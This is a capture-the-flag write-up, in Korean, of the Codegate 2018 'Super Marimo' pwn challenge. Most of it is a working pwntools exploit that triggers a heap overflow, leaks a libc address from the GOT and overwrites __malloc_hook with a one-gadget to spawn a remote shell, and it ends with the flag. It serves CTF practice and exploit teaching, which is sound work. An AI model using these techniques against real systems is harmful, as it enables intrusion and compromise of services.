Codegate CTF 2018 Preliminary - Super Marimo (Pwn)

문제 파일 (marimo)

show me the marimo를 통해 marimo를 2개 생성한다.
시간이 지나면 marimo의 size가 커져서 overflow가 터진다.

libc는 로컬환경이랑 같을까 싶어서 시도해봤더니 운좋게도 같았다.

from pwn import *

def cheat(name, profile):
    r.sendline('show me the marimo')
    r.sendlineafter('>> ', name)
    r.sendlineafter('>> ', profile)
    r.recvuntil('>> ')

def view(idx):
    r.sendline('V')
    r.sendlineafter('>> ', str(idx))
    d = r.recvuntil('\n\n[', drop=True)
    r.sendline('B')
    r.recvuntil('>> ')
    return d

def modify(idx, profile):
    r.sendline('V')
    r.sendlineafter('>> ', str(idx))
    d = r.recvuntil('>> ')
    r.sendline('M')
    r.sendlineafter('>> ', profile)
    r.recvuntil('>> ')
    r.sendline('B')
    r.recvuntil('>> ')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./marimo_sym')

# r = process('./marimo_sym')
# print 'pidof : ', pidof(r)

r = remote('ch41l3ng3s.codegate.kr', 3333)

print r.recvuntil('>> ')

cheat('AAAA', 'CCCC')
cheat('BBBB', 'DDDD')
sleep(0x32)

payload  = p64(0) * 7
payload += p64(elf.got['srand'])

modify(0, payload)

name = view(1).split('\n')[5][7:]

leak_srand = u64(name.ljust(8, '\x00'))
libc.address = leak_srand - libc.symbols['srand']
one_shot = libc.address + 0xf02a4

log.info('leak_srand : ' + hex(leak_srand))
log.info('libc_base : ' + hex(libc.address))
log.info('__malloc_hook : ' + hex(libc.symbols['__malloc_hook']))
log.info('one_shot : ' + hex(one_shot))

payload  = p64(0) * 8
payload += p64(libc.symbols['__malloc_hook'])
modify(0, payload)

payload = p64(one_shot)
modify(1, payload)

r.sendline('show me the marimo')

r.interactive()

flag : But_every_cat_is_more_cute_than_Marimo